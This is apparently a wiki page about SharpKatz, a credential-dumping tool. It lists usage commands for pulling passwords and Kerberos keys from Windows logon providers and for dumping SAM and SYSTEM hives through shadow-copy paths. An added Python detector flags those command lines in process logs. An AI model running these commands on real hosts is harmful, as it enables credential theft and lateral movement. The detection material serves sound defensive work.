SharpKatz

From RCATs
Revision as of 05:03, 21 August 2023 by Ali3nw3rx

Links

https://github.com/b4rtik/SharpKatz

Usage

#List Kerberos encryption keys
SharpKatz.exe --Command ekeys

#Retrieve user credentials from the Msv provider
SharpKatz.exe --Command msv

#Retrieve user credentials from the Kerberos provider
SharpKatz.exe --Command kerberos

#Retrieve user credentials from the Tspkg provider
SharpKatz.exe --Command tspkg

#Retrieve user credentials from the Credman provider
SharpKatz.exe --Command Credman

#Retrieve user credentials from the WDigest provider
SharpKatz.exe --Command wdigest

#Retrieve user credentials from all providers
SharpKatz.exe --Command logonpasswords

#Enumerate shadowcopies with NtOpenDirectoryObject and NtQueryDirectoryObject
SharpKatz.exe --Command listshadows

#Dump credentials from the provided SAM database
SharpKatz.exe --Command dumpsam --System \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM --Sam \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
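
Detection

The command lines above leave a recognisable shape in process-creation logs. The following is an added example, not part of the original page or of the SharpKatz project: it classifies command lines by the `--Command` values listed under Usage and by the shadow-copy hive path, independent of the executable's file name. The label strings, function names and sample events are assumptions constructed for illustration.

```python
import re

# Command names taken from the usage list on this page.
CRED_COMMANDS = {"ekeys", "msv", "kerberos", "tspkg", "credman",
                 "wdigest", "logonpasswords", "dumpsam"}
RECON_COMMANDS = {"listshadows"}

# "--Command <name>", any case, regardless of the executable's name.
COMMAND_RE = re.compile(r"--command\s+(\w+)", re.IGNORECASE)
# A SAM or SYSTEM hive addressed through a shadow-copy device path.
# "\\+" accepts single backslashes or the doubled form seen in escaped logs.
SHADOW_HIVE_RE = re.compile(
    r"GLOBALROOT\\+Device\\+HarddiskVolumeShadowCopy\d+\\+"
    r".*?\\+config\\+(SAM|SYSTEM)\b", re.IGNORECASE)

# Constructed process-creation command lines (not real telemetry).
SAMPLE_EVENTS = [
    r"C:\Users\Public\SharpKatz.exe --Command logonpasswords",
    r"C:\\Temp\\updater.exe --command DumpSam --System "
    r"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1"
    r"\\Windows\\System32\\config\\SYSTEM",
    r"C:\Temp\svc.exe --COMMAND ListShadows",
    r"C:\Tools\build.exe --Command status",
]

def classify(command_line):
    """Return a sorted list of finding labels for one command line."""
    findings = set()
    match = COMMAND_RE.search(command_line)
    if match:
        name = match.group(1).lower()
        if name in CRED_COMMANDS:
            findings.add("credential-command:" + name)
        elif name in RECON_COMMANDS:
            findings.add("shadowcopy-enum:" + name)
    if SHADOW_HIVE_RE.search(command_line):
        findings.add("shadowcopy-hive-path")
    return sorted(findings)

def scan(events):
    """Return (command_line, findings) pairs for events with any finding."""
    return [(e, f) for e in events for f in [classify(e)] if f]

if __name__ == "__main__":
    for line, labels in scan(SAMPLE_EVENTS):
        print(labels, "<-", line)
```

Command-line matching is a single signal and sees nothing when the arguments never reach a process-creation log, so pair it with LSASS handle-access telemetry.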